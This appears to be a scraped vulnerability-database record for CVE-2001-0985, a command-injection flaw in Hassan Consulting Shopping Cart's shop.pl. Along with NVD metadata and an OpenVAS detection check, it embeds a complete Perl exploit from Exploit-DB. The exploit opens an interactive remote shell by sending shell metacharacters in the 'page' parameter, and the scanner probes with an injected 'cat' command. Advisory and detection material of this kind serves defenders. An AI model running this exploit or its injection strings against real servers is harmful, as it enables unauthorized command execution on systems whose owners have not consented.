ID CVE-2001-0985
Type cve
Reporter NVD
Modified 2017-12-18T21:29:29
Description
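shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the "page" parameter. According to the advisory text carried in this record, the script does not filter characters such as "|" or ";" from web request input, so injected commands run with the privileges of the web server process. The only remediation this record lists is the scanner check's "Contact the author for a patch."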
{"id": "CVE-2001-0985", "bulletinFamily": "NVD", "title": "CVE-2001-0985", "description": "shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the \"page\" parameter.", "published": "2001-09-08T00:00:00", "modified": "2017-12-18T21:29:29", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0985", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/3308", "https://exchange.xforce.ibmcloud.com/vulnerabilities/7106", "http://www.irata.com/shopver.html", "http://www.securityfocus.com/archive/1/212827"], "cvelist": ["CVE-2001-0985"], "type": "cve", "lastseen": "2017-12-19T12:21:04", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:hassan_consulting:shopping_cart:1.23"], "cvelist": ["CVE-2001-0985"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the \"page\" parameter.", "edition": 1, "enchantments": {"score": {"modified": "2016-09-03T03:06:30", "value": 7.6}}, "hash": "13df75bc1031d3373343fdbcaedc07b1793120abf5b3853397cb4f8554fda7c6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "34862c3d021b97440c726dc700b27b20", "key": "modified"}, {"hash": "019d96ea584658777a86591ae36113ab", "key": "cvelist"}, {"hash": "55d448f4a1e8d71f2420503afbbe5821", "key": "title"}, {"hash": "bd2356f397fba295859a0b61e800184c", "key": "references"}, {"hash": "cf3fc0f4d0304e01ae517115c5920d78", "key": "description"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": 
"cvss"}, {"hash": "3e415413cddc94fba1abfd9e2a7d2244", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "73b5538cc4829a27b9f000d077f385da", "key": "href"}, {"hash": "26f9b5929e84677d0cf3f76b9bb79d31", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0985", "id": "CVE-2001-0985", "lastseen": "2016-09-03T03:06:30", "modified": "2008-09-05T16:25:24", "objectVersion": "1.2", "published": "2001-09-08T00:00:00", "references": ["http://www.securityfocus.com/bid/3308", "http://xforce.iss.net/static/7106.php", "http://www.irata.com/shopver.html", "http://www.securityfocus.com/archive/1/212827"], "reporter": "NVD", "scanner": [], "title": "CVE-2001-0985", "type": "cve", "viewCount": 3}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T03:06:30"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "26f9b5929e84677d0cf3f76b9bb79d31"}, {"key": "cvelist", "hash": "019d96ea584658777a86591ae36113ab"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "cf3fc0f4d0304e01ae517115c5920d78"}, {"key": "href", "hash": "73b5538cc4829a27b9f000d077f385da"}, {"key": "modified", "hash": "5c1750a8721533bc5927a12d24bdeda7"}, {"key": "published", "hash": "3e415413cddc94fba1abfd9e2a7d2244"}, {"key": "references", "hash": "eeab2e4c69d4fd46da778337c348bb14"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "55d448f4a1e8d71f2420503afbbe5821"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "fc68ccd369b4a1d43c0fdb256ec58508d6627f2bcc4a4988ede601f744e6781c", "viewCount": 3, "enchantments": {"score": 
{"value": 7.5, "vector": "NONE", "modified": "2017-12-19T12:21:04"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:21104"]}, {"type": "osvdb", "idList": ["OSVDB:635"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010764"]}], "modified": "2017-12-19T12:21:04"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:hassan_consulting:shopping_cart:1.23"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-02T15:40:57", "bulletinFamily": "exploit", "description": "Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability. CVE-2001-0985. Remote exploit for cgi platform", "modified": "2001-09-08T00:00:00", "published": "2001-09-08T00:00:00", "id": "EDB-ID:21104", "href": "https://www.exploit-db.com/exploits/21104/", "type": "exploitdb", "title": "Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/3308/info\r\n\r\nHassan Consulting's Shopping Cart is commercial web store software.\r\n\r\nShopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a request which causes arbitrary commands to be executed on the host (with the privileges of the webserver process). For example, special shell characters like \"|\" or \";\" are treated as valid by Shopping Cart.\r\n\r\n\r\n#####################################################\r\n# Shopcart exploit\r\n# Spawn bash style Shell with webserver uid\r\n#\r\n# Spabam 2003 PRIV8 code\r\n# #hackarena irc.brasnet.org\r\n# This Script is currently under development\r\n#####################################################\r\nuse strict;\r\nuse IO::Socket;\r\nmy $host;\r\nmy $port;\r\nmy $command;\r\nmy $url;\r\nmy @results;\r\nmy $probe;\r\nmy @U;\r\nmy $shit;\r\n$U[1] = \"/cgi-local/shop.pl/page=;\";\r\n&intro;\r\n&scan;\r\n&choose;\r\n&command;\r\n&exit;\r\nsub intro {\r\n&help;\r\n&host;\r\n&server;\r\nsleep 3;\r\n};\r\nsub host {\r\nprint \"\\nHost or IP : \";\r\n$host=<STDIN>;\r\nchomp $host;\r\nif ($host eq \"\"){$host=\"127.0.0.1\"};\r\n$shit=\"|\";\r\n$port=\"80\";\r\nchomp $port;\r\nif ($port =~/\\D/ ){$port=\"80\"};\r\nif ($port eq \"\" ) {$port = \"80\"};\r\n};\r\nsub server {\r\nmy $X;\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\n$probe = \"string\";\r\nmy 
$output;\r\nmy $webserver = \"something\";\r\n&connect;\r\nfor ($X=0; $X<=10; $X++){\r\n\t$output = $results[$X];\r\n\tif (defined $output){\r\n\tif ($output =~/Apache/){ $webserver = \"Apache\" };\r\n\t};\r\n};\r\nif ($webserver ne \"Apache\"){\r\nmy $choice = \"y\";\r\nchomp $choice;\r\nif ($choice =~/N/i) {&exit};\r\n }else{\r\nprint \"\\n\\nOK\";\r\n\t};\t\t\r\n}; \r\nsub scan {\r\nmy $status = \"not_vulnerable\";\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\nmy $loop;\r\nmy $output;\r\nmy $flag;\r\n$command=\"dir\";\r\nfor ($loop=1; $loop < @U; $loop++) { \r\n$flag = \"0\";\r\n$url = $U[$loop];\r\n$probe = \"scan\";\r\n&connect;\r\nforeach $output (@results){\r\nif ($output =~ /Directory/) {\r\n $flag = \"1\";\r\n\t\t\t $status = \"vulnerable\";\r\n\t\t\t };\r\n\t};\r\nif ($flag eq \"0\") { \r\n}else{\r\n };\r\n};\r\nif ($status eq \"not_vulnerable\"){\r\n\r\n\t\t\t\t};\r\n};\r\nsub choose {\r\nmy $choice=\"0\";\r\nchomp $choice;\r\nif ($choice > @U){ &choose };\r\nif ($choice =~/\\D/g ){ &choose };\r\nif ($choice == 0){ &other };\r\n$url = $U[$choice];\r\n};\r\nsub other {\r\nmy $other = \"/cgi-local/shop.pl/page=;\";\r\nchomp $other;\r\n$U[0] = $other;\r\n};\r\nsub command {\r\nwhile ($command !~/quit/i) {\r\nprint \"\\n[$host]\\$ \";\r\n$command = <STDIN>;\r\nchomp $command;\r\nif ($command =~/quit/i) { &exit };\r\nif ($command =~/url/i) { &choose }; \r\nif ($command =~/scan/i) { &scan };\r\nif ($command =~/help/i) { &help };\r\n$command =~ s/\\s/+/g; \r\n$probe = \"command\";\r\nif ($command !~/quit|url|scan|help/) {&connect};\r\n};\r\n&exit;\r\n}; \r\nsub connect {\r\nmy $connection = IO::Socket::INET->new (\r\n\t\t\t\tProto => \"tcp\",\r\n\t\t\t\tPeerAddr => \"$host\",\r\n\t\t\t\tPeerPort => \"$port\",\r\n\t\t\t\t) or die \"\\nSorry UNABLE TO CONNECT To $host On Port $port.\\n\";\r\n$connection -> autoflush(1);\r\nif ($probe =~/command|scan/){\r\nprint $connection \"GET $url$command$shit 
HTTP/1.0\\r\\n\\r\\n\";\r\n}elsif ($probe =~/string/) {\r\nprint $connection \"HEAD / HTTP/1.0\\r\\n\\r\\n\";\r\n};\r\n\r\nwhile ( <$connection> ) { \r\n\t\t\t@results = <$connection>;\r\n\t\t\t };\r\nclose $connection;\r\nif ($probe eq \"command\"){ &output };\r\nif ($probe eq \"string\"){ &output };\r\n}; \r\nsub output{\r\nmy $display;\r\nif ($probe eq \"string\") {\r\n\t\t\tmy $X;\r\n\t\t\tfor ($X=0; $X<=10; $X++) {\r\n\t\t\t$display = $results[$X];\r\n\t\t\tif (defined $display){print \"$display\";};\r\n\t\t\tsleep 1;\r\n\t\t\t\t};\r\n\t\t\t}else{\r\n\t\t\tforeach $display (@results){\r\n\t\t\t print \"$display\";\r\n\t\t\t sleep 1;\r\n\t\t\t\t};\r\n };\r\n}; \r\nsub exit{\r\nprint \"\\n\\n\\n\r\nSPABAM 2003.\";\r\nprint \"\\n\\n\\n\";\r\nexit;\r\n};\r\nsub help {\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\nprint \"\\n\r\n ShopCart.pl v1.5 by SPABAM 2003\";\r\nprint \"\\n\r\n\";\r\nprint \"\\n Hassan Consulting's Shopping Cart Version 1.18 Exploit\";\r\nprint \"\\n \r\n\r\n(this version is unstable. Require %20 instead space)\r\nnote.. web directory is normally /var/www/html\";\r\nprint \"\\n\";\r\nprint \"\\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)\";\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\n};\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21104/"}], "openvas": [{"lastseen": "2018-09-01T23:35:57", "bulletinFamily": "scanner", "description": "We detected the presence of the Shopping Cart\n CGI (Hassan). 
A security problem in this CGI allows execution of arbitrary commands.", "modified": "2017-04-28T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010764", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010764", "title": "Shopping Cart Arbitrary Command Execution (Hassan)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: shopping_cart_information_disclosure.nasl 6046 2017-04-28 09:02:54Z teissa $\n#\n# Shopping Cart Arbitrary Command Execution (Hassan)\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 Noam Rathaus <noamr@securiteam.com>\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10764\");\n script_version(\"$Revision: 6046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-28 11:02:54 +0200 (Fri, 28 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3308);\n script_cve_id(\"CVE-2001-0985\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Shopping Cart Arbitrary Command Execution (Hassan)\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/unixfocus/5QP072K5FK.html\");\n\n script_tag(name:\"solution\", value:\"Contact the author for a patch.\");\n script_tag(name:\"summary\", value:\"We detected the presence of the Shopping Cart\n CGI (Hassan). 
A security problem in this CGI allows execution of arbitrary commands.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list_unique( \"/\", \"/cgi-local\", \"/cgi_bin\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = string( dir, \"/shop.pl/page=;cat%20shop.pl|\" );\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n\n if( egrep( pattern:\"^#!/.*/perl\", string:buf ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[CVE-2001-0985](https://vulners.com/cve/CVE-2001-0985)\nBugtraq ID: 3308\n", "modified": "2001-09-08T00:00:00", "published": "2001-09-08T00:00:00", "id": "OSVDB:635", "href": "https://vulners.com/osvdb/OSVDB:635", "title": "Hassan Consulting shop.pl page Parameter Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}